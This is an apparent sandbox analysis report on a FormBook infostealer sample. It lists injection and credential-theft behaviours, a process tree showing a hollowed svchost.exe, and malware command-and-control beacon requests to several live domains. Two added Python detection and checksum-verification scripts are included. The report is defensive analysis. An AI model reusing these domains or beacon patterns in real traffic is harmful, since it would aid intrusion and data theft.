
Windows Analysis Report
payments.exe

Overview

General Information

Sample name: payments.exe
Analysis ID: 1560289
MD5: 63c1545a3e20b0dc33a010e441943d0f
SHA1: 316d618c16be07f4783045b6e1d9be6cd516915b
SHA256: 8d8c60a5a1bdde82ded1b5c433703d5f4b1063c102df9a5df34e963032cadf73

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • payments.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\payments.exe" MD5: 63C1545A3E20B0DC33A010E441943D0F)
    • svchost.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\payments.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XhwUfLdILQipZF.exe (PID: 6004 cmdline: "C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 7580 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • XhwUfLdILQipZF.exe (PID: 6608 cmdline: "C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7900 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author):
00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(3 further memory-dump matches were collapsed on the original page; the full set of eight appears under AV Detection.)

Yara matches in unpacked PE files (Source | Rule | Description | Author):
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Sigma match. Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\payments.exe", CommandLine: "C:\Users\user\Desktop\payments.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\payments.exe", ParentImage: C:\Users\user\Desktop\payments.exe, ParentProcessId: 7444, ParentProcessName: payments.exe, ProcessCommandLine: "C:\Users\user\Desktop\payments.exe", ProcessId: 7536, ProcessName: svchost.exe
Sigma match. Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\payments.exe", CommandLine: "C:\Users\user\Desktop\payments.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\payments.exe", ParentImage: C:\Users\user\Desktop\payments.exe, ParentProcessId: 7444, ParentProcessName: payments.exe, ProcessCommandLine: "C:\Users\user\Desktop\payments.exe", ProcessId: 7536, ProcessName: svchost.exe
No Suricata rule has matched
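The two Sigma matches above are one event seen by two rules: svchost.exe (PID 7536) started by payments.exe (PID 7444), with a command line that still reads "C:\Users\user\Desktop\payments.exe". A system image carrying a foreign command line is what the "Creates a process in suspended mode", "Writes to foreign memory regions" and "Modifies the context of a thread in another process" signatures add up to: the sample starts svchost.exe suspended and replaces its contents. The Python below is an added example, not part of the Joe Sandbox report. It replays the report's process tree as constructed Sysmon-style events and implements the two checks a detection engineer would write from it: an svchost.exe parent allowlist in the spirit of the "Uncommon Svchost Parent Process" rule (the allowlist here is an assumption, not the Sigma rule's own list) and an image-versus-command-line mismatch check, plus an ancestry walk back to the initial sample. The parent of payments.exe (explorer.exe, PID 1000) is assumed; the report does not show it.

```python
"""Replay the report's process tree and flag the hollowed svchost.exe."""
import ntpath

# Constructed Sysmon-style process-creation events (Event ID 1 fields, trimmed).
# PIDs, images and command lines follow the report's process tree; the parent
# of payments.exe (explorer.exe, PID 1000) is an assumption, not from the report.
PROG86 = r"C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX"
EVENTS = [
    {"pid": 1000, "ppid": 4, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 7444, "ppid": 1000, "image": r"C:\Users\user\Desktop\payments.exe",
     "cmdline": r'"C:\Users\user\Desktop\payments.exe"'},
    # svchost.exe image created with the parent's command line: the hollowing tell.
    {"pid": 7536, "ppid": 7444, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\payments.exe"'},
    {"pid": 6004, "ppid": 7536, "image": PROG86 + r"\XhwUfLdILQipZF.exe",
     "cmdline": '"' + PROG86 + r'\XhwUfLdILQipZF.exe"'},
    {"pid": 7580, "ppid": 6004, "image": r"C:\Windows\SysWOW64\pcaui.exe",
     "cmdline": r'"C:\Windows\SysWOW64\pcaui.exe"'},
    {"pid": 6608, "ppid": 7580, "image": PROG86 + r"\XhwUfLdILQipZF.exe",
     "cmdline": '"' + PROG86 + r'\XhwUfLdILQipZF.exe"'},
    {"pid": 7900, "ppid": 7580, "image": r"C:\Program Files\Mozilla Firefox\Firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
]

# Images that normally start svchost.exe. Assumed allowlist for this example,
# not the Sigma rule's own list; extend it for the environment.
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "svchost.exe", "rpcnet.exe"}


def basename(path):
    return ntpath.basename(path).lower()


def cmdline_image(cmdline):
    """Lower-cased basename of the executable a Windows command line names."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        exe = cmdline[1:].split('"', 1)[0]
    else:
        exe = cmdline.split(" ", 1)[0]
    return basename(exe)


def ancestry(events, pid):
    """Parent PIDs of `pid`, nearest first, up to the root we have events for."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        chain.append(cur["ppid"])
        cur = by_pid[cur["ppid"]]
    return chain


def detect(events):
    """Return {rule, pid, detail} alerts for the two checks described above."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_img = basename(parent["image"]) if parent else ""
        # Rule 1: svchost.exe whose parent is not a known service-host launcher.
        if img == "svchost.exe" and parent_img not in SVCHOST_PARENTS:
            alerts.append({"rule": "uncommon_svchost_parent", "pid": e["pid"],
                           "detail": "parent=" + (parent_img or "unknown")})
        # Rule 2: the recorded command line names a different executable than
        # the image actually mapped, as it does for PID 7536 in the report.
        claimed = cmdline_image(e["cmdline"])
        if claimed and claimed != img:
            alerts.append({"rule": "cmdline_image_mismatch", "pid": e["pid"],
                           "detail": "cmdline names %s, image is %s" % (claimed, img)})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
    print("ancestors of firefox.exe (PID 7900):", ancestry(EVENTS, 7900))
```

Run as a script it prints the two alerts for PID 7536 and the chain 7580, 6004, 7536, 7444, 1000 for the injected firefox.exe. On real data, feed Sysmon Event ID 1 records (ProcessId, ParentProcessId, Image, CommandLine) in place of EVENTS. The mismatch rule alone will also fire on the occasional legitimate program whose command line names a different executable than its image (launchers, renamed binaries), so use it together with the parent check rather than on its own.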

AV Detection

Source: http://www.acond-22-mvr.click/w9z4/ | Avira URL Cloud: Label: malware
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: payments.exe | Joe Sandbox ML: detected
Source: payments.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: pcaui.pdb | source: svchost.exe, 00000002.00000003.1424379839.000000000304D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1424379839.000000000302B000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000003.1888424648.00000000011DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: XhwUfLdILQipZF.exe, 00000003.00000000.1375164314.0000000000D0E000.00000002.00000001.01000000.00000004.sdmp, XhwUfLdILQipZF.exe, 00000006.00000000.1536552318.0000000000D0E000.00000002.00000001.01000000.00000004.sdmp (this PDB path shows that XhwUfLdILQipZF.exe is a renamed copy of the sandbox's own FakeChrome tool, so its MD5 is specific to this environment; the randomly named directory under Program Files (x86) is the portable indicator)
Source: Binary string: wntdll.pdbUGP | source: payments.exe, 00000000.00000003.1357793161.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, payments.exe, 00000000.00000003.1357005874.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358223531.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360100767.0000000003500000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1470322862.000000000440E000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1468233780.0000000004259000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.000000000475E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: payments.exe, 00000000.00000003.1357793161.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, payments.exe, 00000000.00000003.1357005874.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1455944553.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358223531.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360100767.0000000003500000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000004.00000002.3801220213.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1470322862.000000000440E000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1468233780.0000000004259000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.000000000475E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: pcaui.exe, 00000004.00000002.3802641063.0000000004BEC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1761090019.000000002FC0C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: pcaui.exe, 00000004.00000002.3802641063.0000000004BEC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1761090019.000000002FC0C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: pcaui.pdbGCTL | source: svchost.exe, 00000002.00000003.1424379839.000000000304D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1424379839.000000000302B000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000003.1888424648.00000000011DB000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CD6CA9
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00CD60DD
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00CD63F9
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CDEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDEB60
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CDF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CDF5FA
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CDF56F FindFirstFileW,FindClose,0_2_00CDF56F
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CE1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CE1B2F
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CE1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CE1C8A
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CE1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CE1F94
Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4_2_026BC920 FindFirstFileW,FindNextFileW,FindClose,4_2_026BC920
Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4x nop then xor eax, eax | 4_2_026A9E10
Source: C:\Windows\SysWOW64\pcaui.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_044C04E8
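Two of the static findings on this page can be reproduced without the sandbox: the COFF characteristics reported for payments.exe (EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE) and the "PE file contains an invalid checksum" signature from the overview. The Python below is an added example, not part of the Joe Sandbox report. It implements the PE header checksum as imagehlp's CheckSumMappedFile computes it (a carry-folded 32-bit sum of every dword except the CheckSum field itself, folded to 16 bits, plus the file length), decodes the characteristics bits, and, because the sample is not available here, builds a minimal PE32 header in memory as a constructed input. For a real file, pass its bytes to the same functions. A zero or wrong checksum is not proof of tampering on its own (many build chains leave the field unset), which is why the report weighs it as one signal among many.

```python
"""Verify a PE file's header checksum and decode its COFF characteristics."""
import struct

# IMAGE_FILE_* bits, including the three named in the report's static PE line.
CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}


def pe_offsets(data):
    """Return (coff_offset, optional_header_offset, checksum_field_offset)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    opt = coff + 20
    # CheckSum is at offset 64 of the optional header for both PE32 and PE32+.
    return coff, opt, opt + 64


def fold_sum(data, skip_dword=-1):
    """16-bit carry-folded sum of little-endian dwords, skipping one dword index."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == skip_dword:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total > 0xFFFFFFFF:            # fold the carry back into the low 32 bits
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return total & 0xFFFF


def pe_checksum(data):
    """Value the CheckSum field should hold for this image."""
    _, _, cks_off = pe_offsets(data)
    return fold_sum(data, skip_dword=cks_off // 4) + len(data)


def verify_checksum(data):
    """Return (is_valid, stored, computed). A stored value of 0 means 'never set'."""
    _, _, cks_off = pe_offsets(data)
    stored = struct.unpack_from("<I", data, cks_off)[0]
    computed = pe_checksum(data)
    return stored == computed, stored, computed


def characteristics(data):
    """Names of the IMAGE_FILE_* bits set in the COFF header."""
    coff, _, _ = pe_offsets(data)
    flags = struct.unpack_from("<H", data, coff + 18)[0]
    return [name for bit, name in CHARACTERISTICS.items() if flags & bit]


def build_minimal_pe(checksum=0):
    """Constructed sample: DOS header + PE32 headers, no sections (not the report's file)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    # COFF: i386, 0 sections, 0xE0-byte optional header,
    # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | 32BIT_MACHINE as in the report.
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 0xE0, 0x0002 | 0x0020 | 0x0100)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)                         # CheckSum field
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    sample = build_minimal_pe()
    ok, stored, computed = verify_checksum(sample)
    print("characteristics:", characteristics(sample))
    print("stored=%#x computed=%#x valid=%s" % (stored, computed, ok))
    print("valid after writing the computed value:", verify_checksum(build_minimal_pe(computed))[0])
```

To check a real sample, read the file with open(path, "rb") and call verify_checksum on the bytes; the sandbox's "invalid checksum" verdict corresponds to is_valid being False with a non-zero stored value, while stored == 0 is the more common "never set" case.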

Networking

Source: DNS query: www.rtpterbaruwaktu3.xyz
Source: DNS query: www.54248711.xyz
Source: Joe Sandbox View | IP Address: 199.59.243.227
Source: Joe Sandbox View | IP Address: 208.91.197.27
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 19 times)
Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CE4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CE4EB5
Source: global traffic | HTTP traffic detected: GET /7yx4/?bBw=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQb1jyxz6bPKG1jNO+cUySHxdHc2K5rg==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.rtpterbaruwaktu3.xyz | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /klhq/?bBw=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ja3Sv08AkNNTw70A3KyR0Ra9u58Xeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.70kdd.top | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /w9z4/?PBk=f4VDN8Bp14IhbV&bBw=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfaaqVLjCwQ54vPxpQXxXjIS5xkDmSEw== HTTP/1.1 | Host: www.acond-22-mvr.click | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /11t3/?bBw=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013w88VAS70Y9JS73ZjbBY8NXuVWXuwPQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.smartcongress.net | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /2pji/?bBw=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT82t+6t4M73z602ZXRfzEt+UzcIaSeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.mrpokrovskii.pro | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /egqi/?bBw=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8lot5wYlOl469WmdukWuN3NsqkmPJjQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.ytsd88.top | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /hyyd/?PBk=f4VDN8Bp14IhbV&bBw=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX3VjmPRmhRH/ifjHqvJrHFSE8BVe6vQ== HTTP/1.1 | Host: www.matteicapital.online | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /rsvy/?bBw=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rQpb0mRwFlkiYxCOBwbKBY/Wtalppug==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.llljjjiii.shop | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /huvt/?bBw=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPcijKU85s4sBliMM2+p3cutSfMcIpXQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.ampsamkok88.shop | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /6gtt/?bBw=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbepy0TXn/sNBWKXnk+HntNHa0bIYL3g==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.gogawithme.live | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /jm2l/?PBk=f4VDN8Bp14IhbV&bBw=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyg51Tr+0rPqFG3CUyYWI31hnfzG2FIQ== HTTP/1.1 | Host: www.54248711.xyz | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.canadavinreport.site | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
